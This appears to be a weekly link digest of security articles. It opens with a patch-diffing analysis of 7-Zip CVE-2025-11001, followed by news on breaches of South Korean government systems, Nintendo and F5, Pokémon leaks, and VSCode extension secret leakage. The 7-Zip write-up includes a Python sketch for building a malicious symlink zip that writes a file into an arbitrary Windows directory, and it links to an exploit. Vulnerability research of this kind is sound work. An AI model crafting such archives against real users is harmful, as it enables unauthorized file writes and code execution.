
Shaarli Weekly

All of a week's links on one page.

Week 42 (October 13, 2025)

Diffing 7-Zip for CVE-2025-11001

pacbypass.github.io
Oct 16, 2025

Introduction
I spend some of my evenings browsing ZDI's Advisory Page, and there I saw two very interesting bugs (CVE-2025-11001, CVE-2025-11002) reported by Ryota Shiga from GMO Flatt Security Inc. The description shows that they are path traversals in 7-Zip, yet the CVSS seems quite low for a potential initial-access bug.

I'd like to mention that there are two bugs disclosed by ZDI affecting this release with the same description and reporter; most likely the other report exploits a symlink bug with UNC paths, as this is also mentioned in the diff.

This post describes a vulnerability in 7-Zip's module responsible for converting Linux symlinks to Windows ones (it handles other types of symlinks as well, but this post will focus on the Linux -> Windows side).

Initial assessment
When diffing 7-Zip 24.09 against 25.00, we can see that a few bugs were fixed in this release. The patch adds a considerable rework of the symlink support in the zip extraction code in CPP/7zip/UI/Common/ArchiveExtractCallback.cpp. My eye instantly darted to the change in IsSafePath.

-bool IsSafePath(const UString &path)
+static bool IsSafePath(const UString &path, bool isWSL)
 {
   CLinkLevelsInfo levelsInfo;
-  levelsInfo.Parse(path);
+  levelsInfo.Parse(path, isWSL);
   return !levelsInfo.IsAbsolute
       && levelsInfo.LowLevel >= 0
       && levelsInfo.FinalLevel > 0;
 }

+bool IsSafePath(const UString &path);
+bool IsSafePath(const UString &path)
+{
+  return IsSafePath(path, false); // isWSL
+}

+void CLinkLevelsInfo::Parse(const UString &path, bool isWSL)
 {
-  IsAbsolute = NName::IsAbsolutePath(path);
+  IsAbsolute = isWSL ?
+      IS_PATH_SEPAR(path[0]) :
+      NName::IsAbsolutePath(path);
   LowLevel = 0;
   FinalLevel = 0;
 }
The bug looks like a case of mishandling Linux or WSL-style symlinks in zip archives. I initially thought of a year-old discussion between Bill Demirkapi and Yarden Shafir on LX symlinks (https://x.com/BillDemirkapi/status/1750226136938725819), but this turned out to be the wrong idea.

Analysis
The main extraction point is CArchiveExtractCallback::GetStream(), which calls ReadLink. This makes the bug annoying to triage, because ReadLink is not involved in parsing the actual symlinks; it instead seems to try to get properties such as kpidHardLink, which are supported in other types of archives.

GetStream calls CArchiveExtractCallback::GetExtractStream, which identifies a symlink by first checking whether it is a small file (< 4 KiB) and then checking the item's type flags (Linux symlink or reparse point).

if (_curSize_Defined && _curSize > 0 && _curSize < (1 << 12))
{
  if (_fi.IsLinuxSymLink())
  {
    is_SymLink_in_Data = true;
    _is_SymLink_in_Data_Linux = true;
  }
  else if (_fi.IsReparse())
  {
    is_SymLink_in_Data = true;
    _is_SymLink_in_Data_Linux = false;
  }
}
After a bunch of additional processing we hop into CArchiveExtractCallback::CloseReparseAndFile, which is where the fun starts. The method attempts to parse the link and get an idea of where it is trying to point.

// Definition
bool CLinkInfo::Parse(const Byte *data, size_t dataSize, bool isLinuxData);

/* some code */

bool repraseMode = false;
bool needSetReparse = false;
CLinkInfo linkInfo;

if (_bufPtrSeqOutStream)
{
  repraseMode = true;
  reparseSize = _bufPtrSeqOutStream_Spec->GetPos();
  if (_curSize_Defined && reparseSize == _outMemBuf.Size())
  {
    // _is_SymLink_in_Data_Linux == true
    needSetReparse = linkInfo.Parse(_outMemBuf, reparseSize, _is_SymLink_in_Data_Linux);
    if (!needSetReparse)
      res = SendMessageError_with_LastError("Incorrect reparse stream", us2fs(_item.Path));
  }
}
The parser sets two crucial attributes:

Link path (the destination path of the symlink)
isRelative (states whether the symlink is relative)

The first issue
What happens when a Linux symlink has a Windows-style C:\ path?

The link path is set to the full C:\ path, yet it is labeled as relative, because the parser applies the Linux-style notion of an absolute path (one starting with '/').

This will come in handy later.

#ifdef SUPPORT_LINKS
if (repraseMode)
{
  _curSize = reparseSize;
  _curSize_Defined = true;

#ifdef SUPPORT_LINKS
  if (needSetReparse)
  {
    if (!DeleteFileAlways(_diskFilePath))
    {
      RINOK(SendMessageError_with_LastError("can't delete file", _diskFilePath))
    }
    {
      bool linkWasSet = false;
      RINOK(SetFromLinkPath(_diskFilePath, linkInfo, linkWasSet))
      if (linkWasSet)
        _isSymLinkCreated = linkInfo.IsSymLink();
      else
        _needSetAttrib = false;
    }
  }
#endif

}
#endif
SetFromLinkPath is the function responsible for creating a symlink with the specified path; however, there was a guard rail in place stopping us from creating links to absolute paths.

if (linkInfo.isRelative)
  relatPath = GetDirPrefixOf(_item.Path);
relatPath += linkInfo.linkPath;

if (!IsSafePath(relatPath))
{
  return SendMessageError2(
      0, // errorCode
      "Dangerous link path was ignored",
      us2fs(_item.Path),
      us2fs(linkInfo.linkPath)); // us2fs(relatPath)
}
7-Zip crafts a relative destination path for the link to point to under the newly extracted archive, then verifies it with IsSafePath. In the case of a relative link, it prepends the directory the symlink resides in within the zip to the path being checked.

The second issue
In our case isRelative == true because the link was previously evaluated as relative, so the symlink's local path inside the archive is prepended to the path being checked, allowing us to bypass the check whenever the symlink sits anywhere but the root directory of the zip file.

The check becomes IsSafePath("some/directory/in/zip" + "C:\some\other\path"), which evaluates to true because the concatenated string no longer starts with a drive letter or a path separator.
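
To make the interplay of these two issues concrete, here is a minimal standalone sketch (Python, not 7-Zip's actual code) of the two mismatched checks; the directory and target paths are purely illustrative.

# Sketch of the pre-25.00 logic (not 7-Zip source): the Linux symlink parser only
# treats targets beginning with '/' as absolute, while the later safety check only
# sees the concatenated (directory prefix + target) string.

def linux_parser_says_relative(link_target: str) -> bool:
    # a Linux symlink is absolute only if it begins with '/'
    return not link_target.startswith("/")

def windows_is_absolute(path: str) -> bool:
    # rough stand-in for NName::IsAbsolutePath: rooted paths or drive-letter paths
    return path.startswith(("/", "\\")) or (len(path) > 1 and path[1] == ":")

link_target = "C:\\some\\other\\path"   # stored in the Linux symlink entry
item_dir = "some/directory/in/zip/"     # where the symlink sits inside the archive

assert linux_parser_says_relative(link_target)   # issue 1: mislabelled as relative
checked = item_dir + link_target                 # issue 2: the prefix is prepended
assert not windows_is_absolute(checked)          # so the IsSafePath-style check passes
# ...yet the reparse point is later created with the raw C:\ target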

The third issue
Later on there is a check that is supposed to validate the actual link path prior to creating the symlink; however, before doing so it checks whether the given "item" (our symlink) is a directory, which it is not, effectively bypassing the check.

if (!_ntOptions.SymLinks_AllowDangerous.Val)
{
#ifdef _WIN32
  if (_item.IsDir) // NOPE
#endif
  if (linkInfo.isRelative)
  {
    CLinkLevelsInfo levelsInfo;
    levelsInfo.Parse(linkInfo.linkPath);
    if (levelsInfo.FinalLevel < 1 || levelsInfo.IsAbsolute)
    {
      return SendMessageError2(
          0, // errorCode
          "Dangerous symbolic link path was ignored",
          us2fs(_item.Path),
          us2fs(linkInfo.linkPath));
    }
  }
}
After all of those checks, a symlink is created with

// existPath -> C:\some\other\path (symlink destination)
// data -> path for symlink to be created
// Initializes reparse data for symlink creation
if (!FillLinkData(data, fs2us(existPath), !linkInfo.isJunction, linkInfo.isWSL))
  return SendMessageError("Cannot fill link data", us2fs(_item.Path));

// ...

// creates symlink
if (!NFile::NIO::SetReparseData(fullProcessedPath, _item.IsDir, data, (DWORD)data.Size()))
{
  RINOK(SendMessageError_with_LastError(kCantCreateSymLink, fullProcessedPath))
  return S_OK;
}
Exploitation
Exploiting this bug is very simple. If we assume that the symlink gets extracted first, we can craft a directory structure as below.

data/link -> symlink to C:\Users\YOURUSERNAME\Desktop (or any other location of your choice)
data/link -> Directory
data/link/calc.exe -> The file you want to write to the target directory

In this case the link is unpacked first, after which calc.exe is unpacked through the symlink, which 7-Zip follows, writing the binary to a directory of your choice.
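
For illustration only, here is a rough sketch of how such an archive could be assembled with Python's zipfile module; the entry names, target path, and payload are placeholders, and the explicit directory entry from the listing above is omitted for brevity.

import zipfile

# Hypothetical layout mirroring the listing above; the target path is attacker-chosen.
target = "C:\\Users\\YOURUSERNAME\\Desktop"

with zipfile.ZipFile("poc.zip", "w") as z:
    # Linux-style symlink entry: Unix mode 0o120777 (S_IFLNK | 0777) in the high 16 bits
    # of external_attr marks the entry as a symlink; the entry's data is the link target.
    link = zipfile.ZipInfo("data/link")
    link.create_system = 3               # 3 = Unix, so the entry carries Unix mode bits
    link.external_attr = 0o120777 << 16
    z.writestr(link, target)

    # A regular file stored under the same name; extracted after the link,
    # it is written through the symlink into the target directory.
    z.writestr("data/link/calc.exe", b"...payload bytes...")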

You can find an example exploit on my GitHub https://github.com/pacbypass/CVE-2025-11001

Basic takeaways
Fixed version is v25.00
Introduced in v21.02
This vulnerability can only be exploited from the context of an elevated user / service account or a machine with developer mode enabled.
This vulnerability can only be exploited on Windows
Thank you
Thank you for reading as well as a huge thank you to Ryota Shiga for discovering this vulnerability!

China Hacked South Korea’s Government, But Was It Really North Korea?

thediplomat.com
By Raphael Rashid
October 07, 2025

White hat hackers exposed a systematic breach of South Korea’s digital backbone, but Seoul remains silent on the crisis.

“It was by accident,” Saber told The Diplomat when asked how the white hat hacker and their partner cyb0rg discovered what appears to be one of the most comprehensive known penetrations of the South Korean government’s digital infrastructure in recent memory.

The two independent security researchers, only identified by their pseudonyms, claim to have compromised a workstation they attributed to Kimsuky, North Korea’s state-sponsored cyber espionage group. They published their findings in August through the hacker magazine Phrack at the annual DEF CON hacker conference in Las Vegas.

Their 8.9GB data dump triggered intense debate about who was really behind the systematic breach of South Korea’s most sensitive systems, and how it could ever have happened.

What the Hackers Found

The leaked data shows deep, sustained access to South Korea’s government backbone. At the center is the Onnara system, the government’s operational platform that handles documents, inter-ministry communications, and knowledge management across central and local agencies.

Technical evidence shows the operator maintained active access to Onnara with custom automation tools and session management capabilities. The dump also revealed compromised email credentials for multiple accounts at the Defense Counterintelligence Command, with phishing attacks continuing until just days before publication.

The breach extended across multiple government institutions. The data includes complete source code from the Ministry of Foreign Affairs’ email platform, alongside evidence of targeting the Supreme Prosecutor’s Office and compromising the Ministry of Unification through brute-force attacks against the ministry’s domain. The dump also contains thousands of GPKI digital certificates – the cryptographic keys securing official communications – along with cracked passwords that protected them.

Telecommunications were also hit. The dump shows access to LG Uplus and credential collections indicating penetration of KT’s infrastructure. These firms are two of South Korea’s three major telecom operators.

Overall, the operator maintained extensive phishing campaigns, malware, and vast credential databases spanning multiple sectors.

The Attribution Puzzle

Based on technical analysis, there is broad consensus that the operations were conducted from China. Browser histories show the operator repeatedly used Google Translate to convert Korean text into simplified Chinese and followed work schedules matching Chinese holidays. Researchers from Korea University’s Graduate School of Information Security found Chinese-language documentation across the operator’s systems, notes written in Chinese characters, and browsing patterns focused on Chinese security websites. Spur, which specializes in proxy infrastructure analysis, traced much of the activity to WgetCloud, a Chinese proxy service predominantly used by China-based users.

Michael “Barni” Barnhart from DTEX, who has extensively tracked North Korean operations, told The Diplomat that “the infrastructure and malware used in these operations do not align with known APT43 tradecraft,” referring to the industry designation for North Korea’s Kimsuky. “The technical signatures, deployment methods, and operational patterns diverge significantly from previously observed APT43 campaigns,” he added. His assessment pointed to linguistic elements in malware communications suggesting “a lower-tier PRC-aligned actor.”

S2W, a South Korean cybersecurity firm, assessed that the actor was “unlikely to be directly associated with the North Korea-linked threat group Kimsuky,” citing inconsistent operational patterns and different toolsets from known Kimsuky operations.

But experts remain sharply divided on who was actually controlling these China-based operations. Some believe Chinese actors were working independently for Chinese intelligence interests. Others point to potential China-North Korea collaboration, given the documented precedent of North Korean operations from Chinese territory. Proponents of this view include Saber, who told The Diplomat that they believe the hacked hacker “is a Chinese national working from China and for both Chinese and North Korean government interests.”

A third theory suggests North Korea outsourced operations to Chinese contractors. The workstation involved was configured for the Korean time zone and its targets aligned with Kimsuky’s traditional focus on South Korean government institutions, potentially suggesting North Korean direction despite Chinese execution.

Barnhart noted that APT43 “is not assessed to be in a position of intelligence scarcity that would necessitate outsourcing to non-DPRK entities,” though such arrangements might “more plausibly align with Russian interests.”

The fourth possibility involves sophisticated Chinese false flag operations designed to implicate North Korea while pursuing separate intelligence objectives.

Seoul’s Fragmented Response

South Korea’s response has focused on damage control rather than accountability, likely reflecting both the scale and sensitivity of the hack, especially given the China connection.

Presidential spokesperson Kang Yu-jung claimed “no accurate information” when questioned about the breaches, deflecting to the Ministry of National Defense (MND). The MND has yet to comment publicly on the incident. When The Diplomat approached the Korea Internet & Security Agency, the agency deflected to the Ministry of Science and ICT (MSIT).

When approached directly, MSIT issued a brief statement: “MSIT is responsible for cyber threat response in the private information and communications sector, so we ask for your understanding that it is difficult to answer your questions.”

The Ministry of Unification acknowledged the incident, stating it had been “aware of security vulnerabilities in advance through cooperation with related agencies and completed measures.” The ministry confirmed implementing “security education for all staff” and strengthening “operational system security measures” following the breach.

Professor Kim Seung-joo from Korea University has been a vocal critic of the government, highlighting the absence of a cybersecurity “control tower.” At a recent parliamentary hearing into the KT and LG Uplus breaches – which mirrored a separate breach of SK Telecom, the country’s largest telecoms company – Kim said, “Our country’s government needs to think about how our intelligence capabilities are not even as good as two foreign hackers.”

When asked whether the breach constituted a national security crisis beyond mere data theft, he replied, “Yes, I see it that way.”

Seoul’s muted response could reflect diplomatic sensitivities around potential Chinese involvement. President Lee Jae-myung’s “pragmatic” diplomacy has sought improved relations with Beijing, with bilateral summit talks under consideration when President Xi Jinping visits for the upcoming APEC leaders’ meeting at the end of October. Direct attribution to China could complicate these efforts.

Beyond the diplomatic angle, confirmation of the link to China could potentially inflame anti-China sentiment and conspiracy theories, which have manifested in recent far-right rallies. The government is keen to defuse these narratives.

A Systematic Campaign

The government’s lack of response becomes more concerning when viewed alongside evidence of widespread penetration across South Korea’s critical infrastructure.

According to data obtained by lawmakers, there were over 9,000 cyber intrusion attempts against military networks in the first half of 2025 alone, up 36 percent from 2023.

The Ministry of Health and Welfare and its agencies also faced over half a million hacking attempts by August 2025, up 151 percent from 2022. The ministry has seen a staggering 4,813 percent increase in targeting compared to 2022.

Yet despite planned increases in overall cybersecurity spending for 2026, critics argue that the government’s record 35.3 trillion won R&D budget plan lacks dedicated cybersecurity categories, with security funding either embedded within other sectors or missing entirely.

The fragility of critical government infrastructure was demonstrated in September when a battery fire at the National Information Resources Service in Daejeon shut down 647 government systems – nearly one-third of all national information systems. The National Intelligence Service raised the cyber threat level as a result, citing fears hackers could exploit potential security gaps during recovery work ahead of the APEC leaders meeting.

These vulnerabilities may represent only the visible portion of a far more serious compromise. Evidence in the Phrack data dump seen by The Diplomat suggests the penetration likely extended to highly sensitive materials related to North Korea and intelligence gathering operations. Given that the obtained data pertains to only one workstation, the discovery potentially reveals a much wider breach, raising further questions about attribution, potential false flag operations, and the purpose of gaining such information.

When specifically questioned about access to such materials, the Ministry of Unification provided vague responses, stating it was “currently investigating with related agencies” without elaborating which ones or the scope of the potential compromise.

As investigations continue, the question of attribution remains complex, but the scale of compromise across both public and private sectors is becoming clear, representing a strategic failure with implications for national security and public confidence in critical infrastructure.

“Hopefully researchers will take a closer look at the dumps and better understand how these APTs harass citizens,” Saber said. “The world would be a better place without them.”

Nintendo allegedly hacked by Crimson Collective hacking group — screenshot shows leaked folders, production assets, developer files, and backups

Tom's Hardware
By Jowi Morales
October 11, 2025

The Crimson Collective hacking group claims to have breached Nintendo's security and stolen files from the gaming company.
A high-profile hacking group called Crimson Collective claimed that it had successfully hacked Nintendo, which is notorious for being litigious and overprotective of its intellectual property. Cybersecurity intelligence firm Hackmanac shared a screenshot on X that allegedly showed proof of the attack, with folders that seemingly stored Nintendo data, including production assets, developer files, and backups. However, the Japanese gaming giant is yet to make a statement about this attack, so we’re unsure if this is real or just a made-up screenshot.

Crimson Collective is the group behind the recent attack on Red Hat, during which it gained unauthorized access to the company’s GitHub repositories and stole about 570GB of data. The group then attempted to extort the company but was simply dismissed. Red Hat eventually confirmed the breach, opting to work with the authorities to pursue the attackers and collaborating with its affected clients to rectify the issue.

If this attack on Nintendo is legitimate and perpetrated by the same party, then it’s likely they are attempting the same tactic of contacting the gaming giant through official channels and asking for payment to delete the stolen data, or else they will leak it.

This isn’t the first time that hackers have attacked a gaming company. Rockstar was previously targeted by an attack in 2023, and some of the source code for Grand Theft Auto VI was leaked online. In the same year, Insomniac Games, the studio behind several Spider-Man titles, was hit by a ransomware attack, and files related to games and employees were made available for download on the internet. CD Projekt Red was also a victim in 2021, after the source codes for Cyberpunk 2077, The Witcher 3, and several other titles, along with several different files, were stolen and threatened to be released publicly if the company did not pay.

Despite all the noise, Nintendo is known for keeping its secrets. Unless customer or personal data has been targeted or leaked, in which case it is required by law to notify the public of an attack, it’s unlikely that the company will disclose any details of this breach. So, without confirmation from the makers of the Switch 2, we can only guess whether Crimson Collective’s claims are true.

Massive Pokemon leak purportedly covers gen 10 games, scrapped Z-A ideas

Leakers claim Pokémon Wind and Waves will be procedurally generated games that expand endlessly, with a focus on survival elements and exploration.

Pokémon fans may want to tread carefully right now, and not just because Pokémon Legends: Z-A has leaked days ahead of release. It seems that Game Freak may have suffered a much bigger leak than a single game, based on material that is currently circulating on the internet. The content, which purportedly shares a timeline for the next handful of Pokémon games, reveals what could be coming next for the 10th generation of mainline Pokémon games. Is any of it credible, though? There are reasons to believe the leaks are legit, and reasons to be skeptical.

We know that Game Freak did in fact suffer a major breach of information back in 2024 for which Nintendo filed a subpoena earlier this year, in the hopes of catching whoever was behind the leak. The leak, which fans refer to as "teraleak," contained a shocking amount of information not just about immediate games like Pokémon Legends: Z-A, but also a trove of materials that were never meant for public consumption. These included concept art and development documentation for new and old Pokémon games alike. At the time, the leaker suggested that they did not share everything they acquired on Game Freak, like the source code for Pokémon Legends: Z-A. This would imply that more information could potentially leak in the future.

Fast-forward to now, and leak accounts on social media are once again disseminating a bewildering amount of Pokémon content that supposedly originates from the same source. Moreover, these are leak accounts that have a proven track record with Pokémon leaks in the past, like when Pokémon Legends: Z-A's Mega Evolutions were posted on the internet months ahead of schedule. Whether the material actually comes from the same leaker is unclear, especially if the people involved might be in the middle of, or about to be in, a legal battle with Nintendo. Nintendo did not immediately respond to a request for comment.

Another reason the leak seems credible is the volume and quality of the materials floating around. The leaks include dozens of pages of apparent proposal documents for Pokémon Sword and Shield, concept art, and beta footage of Pokémon Legends: Z-A. Some of this material is the sort of thing generative AI could ostensibly create, given that Pokémon games have a specific art style that could be emulated. But things like hand-drawn maps or unpolished gameplay footage seem significantly harder to pull off, given their imperfect nature.

The material is also granular in a way that does not look curated. It's easy to believe someone might be motivated to trick people into believing they've got the inside track on the next mainline Pokémon game. It's not quite as probable that someone would spend time putting together a collection of boring graphs and Excel sheets. Not impossible, but unlikely.

With all of this said, what are leakers actually saying about the next mainline Pokémon games? According to leaked documents, the next big Pokémon games are Pokémon Wind and Waves, and they're aimed for release in 2026. The set of games will reportedly feature procedurally generated islands that are loosely based on Indonesia and Southeast Asia. Unlike most major Pokémon games, Wind and Waves will supposedly begin in a big city rather than a small town. The games are said to have more of a survival bent than previous titles, including the ability to explore jungle and underwater regions. Special focus will be placed on weather elements, which will also be the theme behind the upcoming legendaries. There will be a new type of creature called "seed" Pokémon, but specifics regarding their function are currently being debated. The leaks even claim to outline what fans can expect in terms of rivals and enemy organizations. Get this: The baddie this time is supposedly going to be involved with land development, which runs counter to the untamed environments that Wind and Waves will supposedly allow players to explore.

While some of these ideas border on fantasy — can Game Freak truly pull off a game that could generate new areas infinitely when Scarlet and Violet barely handled open-world environments? — some of the details make sense on paper. It sounds believable that the newest Pokémon games will see Game Freak exploring whatever was trendy years ago — in this case, survival games, open-world environments, and procedural generation. It's also worth noting that Sword and Shield were partially limited by the power of the original Switch. Any future games will not be cross-platform, which would ostensibly free up Game Freak to pursue more technically demanding gameplay concepts.

The other huge asterisk worth considering here is, even if all of what's floating around is true, game development scarcely goes as planned. Five years is a long time from now. Ideas could change down the line or be scrapped entirely. To wit: The beta footage of Pokémon Legends: Z-A shows purported gameplay mechanics that almost certainly aren't in the final game, like third-person shooting mechanics and parkour. Both of these mechanics sound like they pertain to entirely different games than the one Pokémon Legends: Z-A turned out to be, according to previews and its pre-release marketing.

Beyond the mainline games, leaks assert that they've got the entirety of The Pokémon Company's next five years mapped out. For example, the next few years will include a tantalizing game that will include multiple regions from previous games, which the player will be able to explore seamlessly.

The thing is, leaks don't always pan out. Earlier this year, the rumor going around was that the 10th generation of Pokémon games was supposed to be set in Greece. Now those same sources are saying something else entirely. What's different this time around is that there's way more circumstantial evidence that makes the claims sound plausible. And the details are weirdly specific, like footage of water wave simulations and unfinished terrain.

But until Game Freak announces it? Take anything you see regarding Pokémon with a grain of salt.

F5 says hackers stole undisclosed BIG-IP flaws, source code

bleepingcomputer.com
By Bill Toulas
October 15, 2025

U.S. cybersecurity company F5 disclosed that nation-state hackers breached its systems and stole undisclosed BIG-IP security vulnerabilities and source code.

The company states that it first became aware of the breach on August 9, 2025, with its investigations revealing that the attackers had gained long-term access to its system, including the company's BIG-IP product development environment and engineering knowledge management platform.

F5 is a Fortune 500 tech giant specializing in cybersecurity, cloud management, and application delivery networking (ADN) applications. The company has 23,000 customers in 170 countries, and 48 of the Fortune 50 entities use its products.

BIG-IP is the firm's flagship product used for application delivery and traffic management by many large enterprises worldwide.

No supply-chain risk
It’s unclear how long the hackers maintained access, but the company confirmed that they stole source code, vulnerability data, and some configuration and implementation details for a limited number of customers.

"Through this access, certain files were exfiltrated, some of which contained certain portions of the Company's BIG-IP source code and information about undisclosed vulnerabilities that it was working on in BIG-IP," the company states.

Despite this critical exposure of undisclosed flaws, F5 says there's no evidence that the attackers leveraged the information in actual attacks, such as exploiting the undisclosed flaws against systems. The company also states that it has not seen evidence that the private information has been disclosed.

F5 claims that the threat actors' access to the BIG-IP environment did not compromise its software supply chain or result in any suspicious code modifications.

This includes its platforms that contain customer data, such as its CRM, financial, support case management, or iHealth systems. Furthermore, other products and platforms managed by the company are not compromised, including NGINX, F5 Distributed Cloud Services, or Silverline systems' source code.

Response to the breach
After discovering the intrusion, F5 took remediation action by tightening access to its systems, and improving its overall threat monitoring, detection, and response capabilities:

Rotated credentials and strengthened access controls across our systems.
Deployed improved inventory and patch management automation, as well as additional tooling to better monitor, detect, and respond to threats.
Implemented enhancements to our network security architecture.
Hardened our product development environment, including strengthening security controls and monitoring of all software development platforms.
Additionally, the company is focusing on the security of its products through source code reviews and security assessments with support from NCC Group and IOActive.

NCC Group's assessment covered security reviews of critical software components in BIG-IP and portions of the development pipeline in an effort that involved 76 consultants.

IOActive's expertise was called in after the security breach, and the engagement is still in progress. The results so far show no evidence of the threat actor introducing vulnerabilities into critical F5 software source code or the software development build pipeline.

Customers should take action
F5 is still reviewing which customers had their configuration or implementation details stolen and will contact them with guidance.

To help customers secure their F5 environments against risks stemming from the breach, the company released updates for BIG-IP, F5OS, BIG-IP Next for Kubernetes, BIG-IQ, and APM clients.

Despite having no evidence "of undisclosed critical or remote code execution vulnerabilities," the company urges customers to prioritize installing the new BIG-IP software updates.

F5 confirmed that today's updates address the potential impact stemming from the stolen undisclosed vulnerabilities.

Furthermore, F5 support makes available a threat hunting guide for customers to improve detection and monitoring in their environment.

New best practices for hardening F5 systems now include automated checks in the F5 iHealth Diagnostic Tool, which can now flag security risks and vulnerabilities, prioritize actions, and provide remediation guidance.

Another recommendation is to enable BIG-IP event streaming to SIEM and configure the systems to log to a remote syslog server and monitor for login attempts.

"Our global support team is available to assist. You can open a MyF5 support case or contact F5 support directly for help updating your BIG-IP software, implementing any of these steps, or to address any questions you may have" - F5

The company added that it has validated the safety of BIG-IP releases through multiple independent reviews by leading cybersecurity firms, including CrowdStrike and Mandiant.

On Monday, F5 announced that it rotated the cryptographic certificates and keys used for signing its digital products. The change affects installing BIG-IP and BIG-IQ TMOS software images while ISO image signature verification is enabled, and installing BIG-IP F5OS tenant images on host systems running F5OS.

Additional guidance for F5 customers comes from UK's National Cyber Security Centre (NCSC) and the U.S. Cybersecurity and Infrastructure Security Agency (CISA).

Both agencies recommend identifying all F5 products (hardware, software, and virtualized) and making sure that no management interface is exposed on the public web. If an exposed interface is discovered, companies should perform a compromise assessment.

F5 notes that it delayed the public disclosure of the incident at the U.S. government's request, presumably to allow enough time to secure critical systems.

"On September 12, 2025, the U.S. Department of Justice determined that a delay in public disclosure was warranted pursuant to Item 1.05(c) of Form 8-K. F5 is now filing this report in a timely manner," explains F5.

F5 states that the incident has no material impact on its operations. All services remain available and are considered safe, based on the latest available evidence.

BleepingComputer has contacted F5 to request more details about the incident, and we will update this post when we receive a response.


Supply Chain Risk in VSCode Extension Marketplaces

Wiz Blog
Rami McCarthy
October 15, 2025

Wiz Research uncovered 500+ leaked secrets in VSCode and Open VSX extensions, exposing 150K installs to risk. Learn what happened and how it was fixed.

Wiz Research identified a pattern of secret leakage by publishers of VSCode IDE Extensions. This occurred across both the VSCode and Open VSX marketplaces, the latter of which is used by AI-powered VSCode forks like Cursor and Windsurf. Critically, in over a hundred cases this included leakage of access tokens granting the ability to update the extension itself. By default, VS Code will auto-update extensions as new versions become available. A leaked VSCode Marketplace or OpenVSX PAT allows an attacker to directly distribute a malicious extension update across the entire install base. An attacker who discovered this issue would have been able to directly distribute malware to the cumulative 150,000 install base.

Each leaked secret is a result of publisher error. However, after reporting this issue via Microsoft's Security Response Center (MSRC), Wiz has been collaborating with Microsoft on platform level improvements to provide guardrails against future secrets leakage in the VSCode Marketplace. Together, we've also launched a notification campaign to alert impacted publishers and help them address these vulnerabilities.

Discovering a massive secrets leak
In February, attackers started attempting to introduce malware to the VSCode Marketplace. Our initial goal was to identify additional malicious extensions, investigate them, and report them to the Marketplace for removal. While we did end up identifying several interesting malicious extensions, we stumbled on something much more impactful: a scourge of secrets leaking in extension packages.

VSCode extensions are distributed as .vsix files, which can be unzipped and inspected. However, we found that publishers often failed to consider that everything in the package was publicly available, or failed to successfully sanitize their extensions of hardcoded secrets.
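
As a quick illustration of how approachable that inspection is, here is a minimal sketch (not Wiz's tooling; the filename and patterns are illustrative) that lists the contents of a .vsix and flags common secret carriers.

import re
import zipfile

# A .vsix is just a zip archive; everything inside ships to every user who installs the extension.
SUSPECT = re.compile(r"(\.env$|\.cursorrules$|mcp\.json$|config\.json$)")

with zipfile.ZipFile("extension.vsix") as vsix:
    for name in vsix.namelist():
        if SUSPECT.search(name):
            print("worth reviewing:", name)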

In total, we found over 550 validated secrets, distributed across more than 500 extensions from hundreds of distinct publishers. Across the 67 distinct types of secrets we found, there were a few notable categories:

AI provider secrets (OpenAI, Gemini, Anthropic, XAI, DeepSeek, HuggingFace, Perplexity)

High-risk platform secrets (AWS, GitHub, Stripe, Auth0, GCP)

Database secrets (MongoDB, Postgres, Supabase)

From themes to threats
The most interesting and globally impactful secrets are the access tokens that grant the ability to update the extension. For the VSCode Marketplace, these are Azure DevOps Personal Access Tokens. The Open VSX Marketplace uses open-vsx.org Access Tokens.

Over one hundred valid leaked VSCode Marketplace PATs were identified within VSCode Marketplace extensions. Together, they represent an install base of over 85,000 extension installs.

Over thirty leaked OVSX Access Tokens were identified, within either VSCode Marketplace or OVSX extensions. Together, they represent an install base of over 100,000 extension installs.

Much of this massive vulnerable install base is actually contributed by themes. This is interesting, because themes are generally viewed as safer than other extensions, given they don’t carry any code. However, they still increase your attack surface, as there is no technical control preventing themes from bundling malware.

An additional interesting lens on these leaked tokens involves the public distribution of company internal or vendor specific extensions. If you investigate the marketplace, you’ll notice extensions that have a low install count, but are specifically designed to support a single company’s engineers or customers. Internal extensions should not be distributed publicly, but often are for convenience. In one case, we found a VSCode Marketplace PAT that would allow us to push targeted malware to the workforce of a $30 billion market cap Chinese megacorp. Vendor specific extensions are common, and allow for interesting targeting opportunities if compromised. For example, one at risk extension belonged to a Russian construction technology company.

Now how did that get there?
Whenever we discover a new dataset of leaked secrets, we attempt to identify patterns that might indicate the root cause(s) and potential mitigations. In this case, the largest contributor to secrets leakage was the bundling of hidden files, also known as dotfiles. The quantity of .env files was especially prominent, although hardcoded credentials in extension source code were also prevalent.

Over the course of the year, we saw an increase in secrets leaking via AI-related configuration files, including config.json, mcp.json, and .cursorrules. Other common sources included build configuration (e.g. package.json) and documentation (e.g. README.md).

Hardening and Remediation
Discovering this critical issue was one thing; getting it fixed was another. We’ve spent the past six months working with Microsoft to help resolve this issue centrally, ensuring we can patch this gap and disclose responsibly.

The response to this issue took multiple forms.

Notification: Wiz made targeted notifications of the highest risk disclosed secrets throughout this process. Microsoft has further made several rounds of notification to impacted extension publishers reported by Wiz and asked them to take action. Every leaked Visual Studio Marketplace PAT was revoked. For other secrets, Microsoft communicated with publishers regarding their exposure and provided appropriate guidance.

Prevention:

Microsoft integrated secrets scanning capabilities prior to publishing and now blocks extensions with verified secrets, notifying extension owners when secrets are detected. See their announcement: Upcoming Security Enhancement: Secret Detection for Extensions, and follow up Secret Prevention for Extensions: Now in Blocking Mode.

OpenVSX is adding a prefix (ovsxp_) to their tokens. Microsoft supports OpenVSX tokens within their secret scanning of the VSCode Marketplace.

Mitigation: Having prevented further introduction of secrets, Microsoft scanned all existing extensions for embedded secrets and will be working with extension owners to ensure they are remediated by publishing a new, sanitized version of the affected extension.

In June, Microsoft shared their progress and roadmap for VSCode Marketplace security in Security and Trust in Visual Studio Marketplace.

On the publisher side, VSCode extension publishers should scan for secrets prior to publishing.

Guidance for users and administrators
For VSCode users:

Limit the number of installed extensions. Each extension introduces additional attack surface, which should be weighed against the benefit of its usage.

Review extension trust criteria. Consider installation prevalence, reviews, extension history, and publisher reputation, among other metadata, prior to adoption.

Consider auto-update tradeoffs. Auto-updating extensions ensures you consume security updates, but introduces the risk of a compromised extension pushing malware to your machine.

For corporate security teams:

Develop an IDE extension inventory, in order to respond to reports of malicious extensions.

Consider a centralized allowlist for VSCode extensions.

Consider sourcing extensions from the VSCode Marketplace, which currently has more rigorous review and controls, rather than the OpenVSX Marketplace.

Guidance for Platforms on Hardening Secrets
Throughout this process, we observed the diversity in secrets formatting practice, and the downstream impact that can have on security. We want to take this opportunity to highlight the following security practices that platforms can implement in their secrets:

